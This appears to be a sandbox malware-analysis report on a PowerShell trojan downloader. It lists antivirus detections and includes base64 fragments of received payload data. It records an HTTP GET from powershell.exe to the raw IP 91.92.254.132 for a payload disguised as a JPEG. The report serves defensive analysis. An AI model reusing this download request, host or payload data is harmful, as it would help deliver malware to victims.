Data received	LgAAvwMAAGkDAABjqQAA2zAAAHEDAADJfgAARgQAAAQDAADhpwAAES8AANwCAAC2LgAAeg8AAAQDAADIQwAAwRwAAEEDAADhqQAAIDEAAHkDAAC2LgAAXjEAAIEDAAC2LgAAAQIAAKkDAADPTAAAbDEAAIEDAABrggAAdDEAAIEDAABfqgAAezEAALEDAADqOQAAmQoAAIkDAACAqgAALgQAAGEAAACNqgAA4AMAAGEAAACbqgAAgjEAAGEAAAChqgAARgQAAAkBAACmqgAAXi4AAGEAAABmLwAAiTEAAFEBAADONQAARgQAAGEAAAC9qgAAjzEAAMEDAAD4qgAApjEAAMEDAABpPgAArDEAAHEDAACIPQAARgQAAMkDAABwqwAAOQQAADQDAACVOwAAcgYAAMEDAACmrAAApjEAAFkCAAD9sAAAbi4AADwDAAD4OQAAogUAAEQDAADqOQAAkAUAAGEAAABDPQAA7zIAAEwD
Data received	Q2FsbENvbnZGYXN0Y2FsbABJc1BpbnZva2VNZXRob2QAZGxsTmFtZQBmdW5jTmFtZQBHZXREbGxOYW1lAG5hOHF1ZGdJYWFMQ0FHcjdubVAAZ3c3WEdTZ2dJZjZXUDQwTGlEUwBCVzFLV0NnMW9iaGpBTmtGUDh1AE50Slc2Nmc5cndPbXRaRDdsaWEAeExwUWVEZ21ZT1pwbVZtQkdndABTNjlGMGpnUU9hOUVybTJJckk4AEVuZHNXaXRoAGJhN2VjaWdBQld1WEFWYVplQ00ASTIxQmVsZ2MyRml0U2VPdEUydQBTdWJzdHJpbmcASXNOb01hbmdsZQBDaGFyU2V0AElzQ2hhclNldE5vdFNwZWMASXNDaGFyU2V0QW5zaQBJc0NoYXJTZXRVbmljb2RlAElzQ2hhclNldEF1dG8AQmVzdEZpdABJc0Jlc3RGaXRVc2VBc3NlbQBJc0Jlc3RGaXRFbmFibGVkAElzQmVzdEZpdERpc2FibGVkAFRocm93T25Vbm1hcHBhYmxlQ2hhcgBJc1Rocm93T25Vbm1hcHBhYmxlQ2hhclVzZUFzc2VtAElzVGhyb3dPblVubWFwcGFibGVDaGFyRW5hYmxlZABJc1Rocm93T25Vbm1hcHBhYmxlQ2hhckRpc2FibGVkAFN1cHBvcnRzTGFzdEVycm9yAENhbGxDb252AElzQ2FsbENvbnZXaW5hcGkASXNDYWxsQ29udkNkZWNsAElzQ2FsbENvbnZTdGRjYWxsAElzQ2FsbENvbnZUaGlzY2FsbABJc0NhbGxDb252RmFzdGNhbGwAYU1saXdUZ09uRjJWam9rWE9HMgBzY29wZQB5MFpKOU5nRHcydklPWmN5QmUyAGxUZVJuUGdNVm03aUhuRXhXWUkASDJtWkd0ZzN4eWYwcUpyaTJxdwBqcEl3YTRnakNlN3A2Yk5WS1VFAE5GOGM1dWdZbWlMY01pSndwREoASUxFbnJlZ0hrVVFBaEFRdnVXUwBxYmNXc2xnU1N4S0hteUdhSG1IAHBjdVdkMGc1V3FLdkt0ZEYwNksAdFVWY3hWZ0ZSdjJ4VUlyR3FNSwBtN1NEQ2tnWklOV1pqRkt4MjR0AFRyeVRvVXNlVHlwZURlZnMAVHJ5VG9Vc2VNZXRob2REZWZzAFRyeVRvVXNlRmllbGREZWZzAFRyeVRvVXNlRGVmcwBGaXhTaWduYXR1cmUAeEFJbjBMZ3B3YU9RbnRkcUJZQwBtZXRob2REZWYAZmllbGREZWYAbWQ4dUdPZ0dwOFV3QndUZzNHRwBFR25nWFdnZktBVzN4ZnVoZUhyAHJlc29sdmVyAFJ2NjYyWGc4c3lXM0g2bFVJeE4AZ2V0X1RyeVRvVXNlVHlwZURlZnMAc2V0X1RyeVRvVXNlVHlwZURlZnMAZ2V0X1RyeVRvVXNlTWV0aG9kRGVmcwBz

Poweshell is sending data to a remote host (1 event)

Data sent

GET /imge/new-image_j.jpg HTTP/1.1 Host: 91.92.254.132 Connection: Keep-Alive

Communicates with host for which no DNS query was performed (1 event)

host

91.92.254.132

File has been identified by 14 AntiVirus engines on VirusTotal as malicious (14 events)

Skyhigh	Artemis
VIPRE	Heur.BZC.PZQ.Boxter.971.B86F494A
Symantec	ISB.Heuristic!gen39
Kaspersky	HEUR:Trojan.PowerShell.Generic
BitDefender	Heur.BZC.PZQ.Boxter.971.B86F494A
MicroWorld-eScan	Heur.BZC.PZQ.Boxter.971.B86F494A
Emsisoft	Heur.BZC.PZQ.Boxter.971.B86F494A (B)
FireEye	Heur.BZC.PZQ.Boxter.971.B86F494A
Ikarus	Trojan-Downloader.PS.Agent
Google	Detected
Arcabit	Heur.BZC.PZQ.Boxter.971.B86F494A
ZoneAlarm	HEUR:Trojan.PowerShell.Generic
GData	Heur.BZC.PZQ.Boxter.971.B86F494A
MAX	malware (ai score=89)

Network communications indicative of a potential document or script payload download was initiated by the process powershell.exe (1 event)

Time & API	Arguments	Status	Return	Repeated
send July 4, 2024, 10:12 a.m.	buffer: GET /imge/new-image_j.jpg HTTP/1.1 Host: 91.92.254.132 Connection: Keep-Alive socket: 1540 sent: 83	1	83	0

file_3e3wgwby.144.txt.ps1

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All